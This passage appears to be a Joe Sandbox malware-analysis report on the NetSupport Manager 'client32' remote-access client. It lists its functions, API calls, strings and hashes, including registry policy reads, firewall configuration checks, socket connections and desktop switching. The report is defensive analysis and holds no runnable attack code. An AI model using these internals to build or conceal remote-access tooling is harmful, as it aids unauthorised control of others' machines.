                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                • API String ID: 596640303-1725438197
                                                                                                • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                                • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                                Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?), ref: 1106227A
                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?), ref: 11061C9C
                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32 ref: 11061CF4
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 110622CB
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 11062385
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                • API String ID: 2823542970-1528906934
                                                                                                • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                                • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                                Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • GetTickCount.KERNEL32(00000000), ref: 111385E2
                                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32 ref: 11096DF9
                                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                • _memset.LIBCMT ref: 11138633
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                                • _free.LIBCMT ref: 111386AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                • API String ID: 711243594-1270230032
                                                                                                • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                Function 69CE7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ioctlsocket.WSOCK32 ref: 69CE7642
                                                                                                • connect.WSOCK32(00000000,?,69CEAC88), ref: 69CE7659
                                                                                                • WSAGetLastError.WSOCK32 ref: 69CE7660
                                                                                                • _memmove.LIBCMT ref: 69CE76D3
                                                                                                • select.WSOCK32(00000001,00000000,?,?,?), ref: 69CE76F3
                                                                                                • GetTickCount.KERNEL32(?,?,00001004,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE7717
                                                                                                • ioctlsocket.WSOCK32 ref: 69CE775C
                                                                                                • SetLastError.KERNEL32(00000000,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE7762
                                                                                                • WSAGetLastError.WSOCK32(?,?,00001004,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE777A
                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?), ref: 69CE778B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                • API String ID: 4218156244-2969206566
                                                                                                • Opcode ID: 552ff25cfe4a75785d354ee0a0d6e5aaf66f5f9207d82110a6b387d9087094e7
                                                                                                • Instruction ID: 28b1765808607135853ae8d2bf3fb6df2107ae74d9d99ef618aaf60e808b3ed0
                                                                                                • Opcode Fuzzy Hash: 552ff25cfe4a75785d354ee0a0d6e5aaf66f5f9207d82110a6b387d9087094e7
                                                                                                • Instruction Fuzzy Hash: 2341E775D003149BEB21DF64DD5CBAE73BABB44308F0080B9E50A97542FB745A88DBB5
                                                                                                Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                                • LoadMenuA.USER32 ref: 11134DE8
                                                                                                • GetSystemMetrics.USER32(00000021,?,110F8239,00000001,11142328,_debug), ref: 11134DF9
                                                                                                • GetSystemMetrics.USER32(0000000F,?,110F8239,00000001,11142328,_debug), ref: 11134E01
                                                                                                • GetSystemMetrics.USER32(00000004,?,110F8239,00000001,11142328,_debug), ref: 11134E07
                                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A,?,110F8239,00000001,11142328,_debug), ref: 11134E1E
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                                • CreateWindowExA.USER32 ref: 11134E7F
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                • API String ID: 1594747848-1114959992
                                                                                                • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                                • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                                Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                                • GetTickCount.KERNEL32(?), ref: 11133BA1
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                • API String ID: 1170620360-4157686185
                                                                                                • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                                • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                                Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                                • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strtok$Sleep
                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                • API String ID: 2009458258-3774545468
                                                                                                • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                                • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                                Function 69CE8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,69CF67B5), ref: 69CE8D6B
                                                                                                  • Part of subcall function 69CE4F70: LoadLibraryA.KERNEL32(psapi.dll), ref: 69CE4F78
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 69CE8DCB
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 69CE8DD8
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CE8EBF
                                                                                                  • Part of subcall function 69CE4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FC4
                                                                                                  • Part of subcall function 69CE4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,69CE8E0D,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FE4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE8EAE
                                                                                                  • Part of subcall function 69CE5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                  • Part of subcall function 69CE5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                  • Part of subcall function 69CE2420: _strrchr.LIBCMT ref: 69CE242E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                • API String ID: 2714439535-3484705551
                                                                                                • Opcode ID: 7e8abb20700bd0468bbe02a8fea5df271444defeb70454633d876f3c96a9da16
                                                                                                • Instruction ID: 367dde0b6435a4219818fc0aa395475c44678c82e32e247d6d366ceb9bd9c4e1
                                                                                                • Opcode Fuzzy Hash: 7e8abb20700bd0468bbe02a8fea5df271444defeb70454633d876f3c96a9da16
                                                                                                • Instruction Fuzzy Hash: 0F41A4B99002599BEF11CB61ED45FEA7378EB45788F4080B4FB1AA3540FB709A44CB61
                                                                                                Function 11110DE0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 132threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                • GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                • InitializeCriticalSection.KERNEL32((aB,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                • EnterCriticalSection.KERNEL32((aB,?,11031700), ref: 11110EAC
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                • LeaveCriticalSection.KERNEL32((aB,?,11031700), ref: 11110F5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: (aB$..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                • API String ID: 1976012330-3851280824
                                                                                                • Opcode ID: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                • Opcode Fuzzy Hash: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                • OpenDesktopA.USER32 ref: 11103803
                                                                                                • SetThreadDesktop.USER32 ref: 11103810
                                                                                                • CloseDesktop.USER32 ref: 11103829
                                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                                • CloseDesktop.USER32 ref: 11103847
                                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                                Strings
                                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
